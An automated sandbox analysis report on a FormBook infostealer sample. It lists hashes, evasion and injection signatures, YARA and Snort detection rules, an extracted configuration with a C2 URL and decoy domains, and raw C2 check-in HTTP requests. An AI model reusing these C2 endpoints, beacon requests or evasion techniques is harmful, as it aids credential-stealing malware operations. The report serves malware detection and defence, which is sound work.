Loading ...

Play interactive tourEdit tour

Analysis Report eQLPRPErea.exe

Overview

General Information

Sample Name:eQLPRPErea.exe
Analysis ID:383832
MD5:2c64897aa30694cc768f5ea375157932
SHA1:c897f37780a5237d5c330bcf2668745201b38ff5
SHA256:18d465a5867ee069480bb9be8eb259be41cc008e487b7b6a3cad14e3559963a9
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • eQLPRPErea.exe (PID: 6876 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)
    • eQLPRPErea.exe (PID: 6956 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4832 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6616 cmdline: /c del 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.eQLPRPErea.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.eQLPRPErea.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.eQLPRPErea.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.eQLPRPErea.exe.1eb20000.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.eQLPRPErea.exe.1eb20000.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3pAvira URL Cloud: Label: malware
          Source: http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4Avira URL Cloud: Label: malware
          Source: http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReHAvira URL Cloud: Label: malware
          Source: http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3pAvira URL Cloud: Label: malware
          Source: http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3pAvira URL Cloud: Label: malware
          Source: http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3pAvira URL Cloud: Label: malware
          Source: http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: eQLPRPErea.exeVirustotal: Detection: 28%Perma Link
          Source: eQLPRPErea.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 3.2.eQLPRPErea.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.wlanext.exe.8bf110.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.1.eQLPRPErea.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.wlanext.exe.3597960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: eQLPRPErea.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: eQLPRPErea.exe, 00000001.00000003.692305861.000000001ECE0000.00000004.00000001.sdmp, eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: eQLPRPErea.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_0040531D
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,1_2_00405CB0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 1_2_004026BC FindFirstFileA,1_2_004026BC
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 4x nop then pop edi3_2_004162B0
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 4x nop then pop edi3_2_00415644
          Source: C:\Users\user\Desktop\eQLPRPErea.exeCode function: 4x nop then pop edi3_1_004162B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi9_2_008662B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi9_2_00865644

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.stone-master.info/aqu2/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.nagoyadoori.xyz
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1Host: www.biehnrecords.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.bedpee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.pmrack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1Host: www.serversexposed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.heliumhubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1Host: www.420vaca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.shujahumayun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1Host: www.dottproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.autobrehna.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.appgusher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1Host: www.thesixteenthround.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1Host: www.biehnrecords.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.bedpee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.pmrack.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1Host: www.serversexposed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.heliumhubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1Host: www.420vaca.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.shujahumayun.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1Host: www.dottproject.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.qcmax.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1Host: www.playfulpainters.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1Host: www.autobrehna.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
